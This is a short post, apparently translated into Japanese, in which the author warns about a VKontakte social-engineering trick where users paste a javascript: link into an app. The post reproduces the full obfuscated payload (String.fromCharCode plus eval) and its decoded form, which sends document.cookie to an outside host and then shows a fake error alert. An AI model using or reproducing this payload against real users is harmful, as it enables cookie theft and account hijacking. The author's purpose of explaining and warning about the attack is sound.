彼らは先日、Vkontakteアプリケーションを1つ追加するように私をここに招待しました。 関心が勝ちました-そして私は見に登りました。
ここに私が見たものがあります:
行が長いため、アプリケーションの入力フィールドに収まりませんでした。
私は完全にそれを与えます:
javascript:page=String.fromCharCode(105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105,
109,103,46,115,114,99,61,39,104,116,116,112,58,47,47,118,112,111,112,107,117,46,111,114,103,47,115,117,112,47,
115,46,112,104,112,63,113,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59);
eval(page);
alert(unescape("%u041D%u0435%20%u0443%u0434%u0430%u0435%u0442%u0441%u044F%20%u0432%u044B%u043F%u043E%u043B%u043D%u0438%u0442%u044C%20%u0434%u0435%u0439%u0441%u0442%u0432%u0438%u0435%21"));すべてが非常に簡単です。最初に、悪者にcookieを送信するスクリプトが実行されます。
img=new Image();
img.src='http://vpopku.org/sup/s.php?q='+document.cookie;次に、アラートメッセージがユーザーに発行されます。
「アクションを完了できません!」
ユーザーは、どれを見て、動揺しているが何も疑っていないのに、アプリケーションを閉じます。
したがって、サイトのすべてのセキュリティホールが閉じられたとしても、常に最も効果的な方法であるソーシャルエンジニアリングが常に存在することを改めて言いたいと思います。
PS初めて、ソーシャルエンジニアリングとXSSのこのような現れに出会いました。 繰り返した場合-申し訳ありません。